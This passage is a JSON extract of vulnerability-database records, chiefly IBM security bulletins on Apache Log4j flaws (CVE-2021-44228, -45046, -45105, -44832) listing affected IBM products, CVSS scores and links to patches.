"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2023-04-11T01:40:10", "id": "OSV:GHSA-V57X-GXFJ-484Q", "href": "https://osv.dev/vulnerability/GHSA-v57x-gxfj-484q", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ibm": [{"lastseen": "2023-05-23T17:58:26", "description": "## Summary\n\nA Denial of Service issue was identified within the Log4j fix for CVE-2021-45046 that is used by Fabric Gateway to provide logging functionality. Fabric Gateway is used by the IBM MQ blockchain bridge component of IBM MQ to provide connection capability between IBM MQ queue managers and Hyperledger Fabric. The IBM MQ Blockchain Bridge is shipped as part of IBM MQ on Linux x86-64 only, under the MQSeriesBCBridge RPM package. Based on current knowledge and analysis, no other IBM MQ components or installable packages are affected. This bulletin provides patch information to address the reported Log4j vulnerabilities\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n**DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n**CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: <https://exchange.xforce.ibmcloud.com/vulnerabilities/216189> for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM MQ | 9.2 CD \nIBM MQ | 9.1 CD \nIBM MQ | 9.2 LTS \n \n## Remediation/Fixes\n\nThis issue is resolved by APAR IT39467 \n\nThe following patches resolve CVE-2021-45046, CVE-2021-44228, CVE-2021-45105 &amp; CVE-2021-44832\n\n**IBM MQ version 9.2 LTS**\n\n[Apply iFix 9.2.0.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.2.0.4&platform=All&function=fixId&fixids=9.2.0.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467&includeSupersedes=0&source=fc> \"Apply iFix 9.2.0.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467\" )\n\n**IBM MQ version 9.1 CD and 9.2 CD**\n\n[Apply iFix 9.2.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467 ](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.2.4&platform=All&function=fixId&fixids=9.2.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467&includeSupersedes=0&source=fc> \"Apply iFix 9.2.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467\" )\n\n## Workarounds and Mitigations\n\nThe IBM MQ Blockchain Bridge is shipped as part of IBM MQ on Linux x86-64 only, under the MQSeriesBCBridge RPM package. Based on current knowledge and analysis, no other IBM MQ components or installable packages are affected. \n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T18:00:41", "type": "ibm", "title": "Security Bulletin: IBM MQ Blockchain bridge dependencies are vulnerable to issues in Apache Log4j (CVE-2021-45105 & CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-07T18:00:41", "id": "F0259373A53F6B73B3C7BD9A2F3F10DB053D9CC563866E61F5A496D33B416EA9", "href": "https://www.ibm.com/support/pages/node/6538896", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:49", "description": "## Summary\n\nA vulnerability in Apache Log4j could allow an attacker to execute arbitrary code on the system. This vulnerability may affect IBM Spectrum Scale Container Native Storage Access and IBM Spectrum Protect Plus, which are part of the IBM Spectrum Fusion appliance.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Spectrum Fusion HCI| 2.1 \nIBM Spectrum Scale Container Native Storage Access (CNSA)| 5.1.1.3 \nIBM Spectrum Protect Plus| 10.1.8.1 \n \nThe IBM Spectrum Fusion HCI 2.1 appliance includes IBM Spectrum Scale Container Native Storage Access (CNSA) 5.1.1.3 and IBM Spectrum Protect Plus 10.1.8.1, which are impacted by the Apache Log4j (CVE-2021-44228).\n\n * IBM Spectrum Scale CNSA lists a range of versions \"_Customers running IBM Spectrum Scale CNSA V5.1.1.1 through V5.1.2.1._\" but only version 5.1.1.3 is supported by IBM Spectrum Fusion HCI 2.1. \n * IBM Spectrum Protect Plus lists a range of versions \"_10.1.0.0 - 10.1.9.0_\", but only version 10.1.8.1 is supported by IBM Spectrum Fusion HCI 2.1.\n\nRefer the security bulletin links under **Workarounds and Mitigations **section.\n\nNote: The IBM Spectrum Fusion HCI 2.1 management GUI is not impacted by CVE-2021-44228.\n\n## Remediation/Fixes\n\nRefer to the instructions in the **Workarounds and Mitigations** section.\n\n_**\\---&gt;&gt;&gt; UPDATE 16 January 2022 &lt;&lt;&lt;\\---**_\n\n_The fix for vulnerability CVE-2021-44228 is in IBM Spectrum Fusion HCI version 2.1.2_\n\n_See the following page for upgrade instructions:_\n\n_<https://www.ibm.com/support/pages/node/6488389>_\n\n_Upgrading to IBM Spectrum Fusion HCI version 2.1.2 will automatically pick up and upgrade the embedded components IBM Spectrum Scale and IBM Spectrum Protect plus to remediate the log4j vulnerabilities (CVE-2021-44228, CVE-2021-45105, and CVE-2021-45046) in those components respectively._\n\n_**If you upgrade to IBM Spectrum Fusion HCI v2.1.2, then you do not need to follow the workarounds specified in the Workarounds and Mitigations section below.**_\n\n_If you have already followed the workarounds below for CVE-2021-4428, then you will still need to upgrade to IBM Spectrum Fusion v2.1.2 to remediate CVE-2021-45105, CVE-2021-45046._\n\n## Workarounds and Mitigations\n\n_(Update: 16 January 2022: See \"Update\" in Remediation/Fixes section above for new instructions.)_\n\n**IBM strongly recommends addressing the vulnerability now by executing these steps: **\n\n * Refer to the following security bulletin for remediation and additional vulnerability details for IBM Spectrum Scale Container Native Storage Access (CNSA) 5.1.1.3: \n<https://www.ibm.com/support/pages/node/6526202> \n \nIBM Spectrum Scale CNSA lists a range of versions \"_Customers running IBM Spectrum Scale CNSA V5.1.1.1 through V5.1.2.1._\" but only version 5.1.1.3 is supported by IBM Spectrum Fusion HCI 2.1. \n * Refer to the following security bulletin for remediation and additional vulnerability details for IBM Spectrum Protect Plus 10.1.8.1: \n<https://www.ibm.com/support/pages/node/6527828> \n \nIBM Spectrum Protect Plus lists a range of versions \"10.1.0.0 - 10.1.9.0\", but only version 10.1.8.1 is supported by IBM Spectrum Fusion HCI 2.1.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-17T16:44:11", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j (CVE-2021-44228) affects IBM Spectrum Fusion HCI which includes IBM Spectrum Scale Container Native Storage Access and IBM Spectrum Protect Plus", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-4428", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-17T16:44:11", "id": "4490A508C76B3478285658D50CD1591EE7BF09C6C6CB543CD3B4AD02093F6106", "href": "https://www.ibm.com/support/pages/node/6529312", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:45", "description": "## Summary\n\nApache Log4j is used by IBM Spectrum Symphony for generating logs in some of its components such as ELK, GUI and so on. This bulletin provides interim fixes which include Apache Log4j 2.17.1 to fix arbitrary code execution (CVE-2021-44832 and CVE-2021-45046) and denial of service (CVE-2021-45105) in IBM Spectrum Symphony.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n_**Affected Product(s)**_| _**Version(s)**_ \n---|--- \nIBM Spectrum Symphony| 7.2, 7.2.0.2 \nIBM Spectrum Symphony| 7.2.1, 7.2.1.1 \nIBM Spectrum Symphony| 7.3 \nIBM Spectrum Symphony| 7.3.1 \nIBM Spectrum Symphony| 7.3.2 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by upgrading the following interim fixes in the table:**\n\n_**Products**_| _**VRMF**_| _**APAR**_| _**Remediation/First Fix**_ \n---|---|---|--- \nIBM Spectrum Symphony| \n\n7.2/7.2.0.2\n\n| \n\nP104544\n\nP104504\n\nP104509\n\nP104522\n\nP104521\n\n| \n\n[sym-7.2-build600980](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2-build600980&includeSupersedes=0> \"sym-7.2-build600980\" )\n\n[sym-7.2.0.2-build600934](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600934&includeSupersedes=0> \"sym-7.2.0.2-build600934\" )\n\n[sym-7.2.0.2-build600939](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600939&includeSupersedes=0> \"sym-7.2.0.2-build600939\" )\n\n[sym-7.2.0.2-build600941](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600941&includeSupersedes=0> \"sym-7.2.0.2-build600941\" )\n\n[sym-7.2.0.2-build600944](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600944&includeSupersedes=0> \"sym-7.2.0.2-build600944\" ) \n \nIBM Spectrum Symphony| 7.2.1/7.2.1.1| \n\nP104505\n\nP104510\n\nP104524\n\nP104523\n\n| \n\n[sym-7.2.1-build600935](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600935&includeSupersedes=0> \"sym-7.2.1-build600935\" )\n\n[sym-7.2.1-build600940](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600940&includeSupersedes=0> \"sym-7.2.1-build600940\" )\n\n[sym-7.2.1-build600942](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600942&includeSupersedes=0> \"sym-7.2.1-build600942\" )\n\n[sym-7.2.1-build600945](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600945&includeSupersedes=0> \"sym-7.2.1-build600945\" ) \n \nIBM Spectrum Symphony| 7.3| \n\nP104506\n\nP104508\n\n| \n\n[sym-7.3-build600936](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build600936&includeSupersedes=0> \"sym-7.3-build600936\" )\n\n[sym-7.3-build600943](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build600943&includeSupersedes=0> \"sym-7.3-build600943\" ) \n \nIBM Spectrum Symphony| 7.3.1| P104507| [sym-7.3.1-build600937](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build600937&includeSupersedes=0> \"sym-7.3.1-build600937\" ) \nIBM Spectrum Symphony| 7.3.2| P104511| [sym-7.3.2-build600938](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build600938&includeSupersedes=0> \"sym-7.3.2-build600938\" ) \n \n## Workarounds and Mitigations\n\nAs detailed above in the **Remediation / Fixes **section.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-19T02:51:34", "type": "ibm", "title": "Security Bulletin: Due to the use of Apache Log4j, IBM Spectrum Symphony is vulnerable to arbitrary code execution (CVE-2021-44832 and CVE-2021-45046) and denial of service (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-19T02:51:34", "id": "5662007982BBB6B88D91C6C7393CC2022D9415D2290FD0DA76D55E99204FFF35", "href": "https://www.ibm.com/support/pages/node/6539410", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:40", "description": "## Summary\n\nApache Log4j is used by IBM Netcool Agile Service Manager as part of its logging infrastructure. The fix includes Apache Log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Netcool Agile Service Manager| 1.1 - 1.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now. **\n\nFor IBM Netcool Agile Service Manager v1.1 - v1.1.9, upgrade to v1.1.10. \nFor v1.1.10, refresh to the packages that were uploaded on 14th January 2022.\n\nGo to [Download IBM Netcool Agile Service Manager V1.1.10 on premise](<https://www.ibm.com/support/pages/node/589201> \"Download IBM Netcool Agile Service Manager V1.1.10 on premise\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-21T17:03:35", "type": "ibm", "title": "Security Bulletin: IBM Netcool Agile Service Manager is vulnerable to arbitrary code execution and denial of service due to Apache Log4j (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-21T17:03:35", "id": "30495EE9B3C48AB51AC589D2A5956D977474A3BCCB9A67B54801DEE7685C5573", "href": "https://www.ibm.com/support/pages/node/6549838", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:52:59", "description": "## Summary\n\nThere are Remote Attack Vulnerabilities in Apache Log4j (CVE-2021-45105, CVE-2021-45046, CVE-2021-44832) which is used by IBM Engineering Systems Design Rhapsody (RDM) components; Knowledge Center and Test Conductor for logging . The fix includes upgrade to Apache Log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Engineering Systems Design Rhapsody| 9.0, 9.0.1 \nRational Rhapsody| 8.4 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by taking the actions documented in this bulletin.**\n\nFor **IBM Engineering Systems Design Rhapsody** follow the instructions to apply the following fixes:\n\n1\\. The Knowledge Center component for a locally installed help server (KCCI) that is (optionally) installed and configured for the following products: IBM Engineering Systems Design Rhapsody Versions** 8.4, 9.0, 9.0.1.** Select the appropriate version link below and follow the instructions from the support page.\n\n * [8.4](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm%7ERational&product=ibm/Rational/Rational+Rhapsody&release=All&platform=All&function=fixId&fixids=Knowledge-Center-Update-Rhapsody&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"8.4\" )\n * [9.0](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Systems+Design+Rhapsody&release=All&platform=All&function=fixId&fixids=Knowledge-Center-Update-Rhapsody&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"9.0\" )\n * [9.0.1](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Systems+Design+Rhapsody&release=All&platform=All&function=fixId&fixids=Knowledge-Center-Update-Rhapsody&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"9.0.1\" )\n\n2\\. Next, For IBM Engineering Systems Design Rhapsody Versions **9.0, 9.0.1** you will need to also update the **Test Conductor** component. Click the link below for the affected version and follow the instructions from the support page.\n\n * [9.0](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Systems+Design+Rhapsody&release=All&platform=All&function=fixId&fixids=Rhapsody-9.0-TestConductorAdapterForETM-log4j-patch&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"9.0\" )\n * [9.0.1](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Systems+Design+Rhapsody&release=All&platform=All&function=fixId&fixids=Rhapsody-9.0.1-TestConductorAdapterForETM-log4j-patch&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"9.0.1\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-27T21:21:42", "type": "ibm", "title": "Security Bulletin: IBM Engineering Systems Design Rhapsody (Rhapsody) is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44832, CVE-2021-45046, ) and denial of service due to Apache Log4j (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 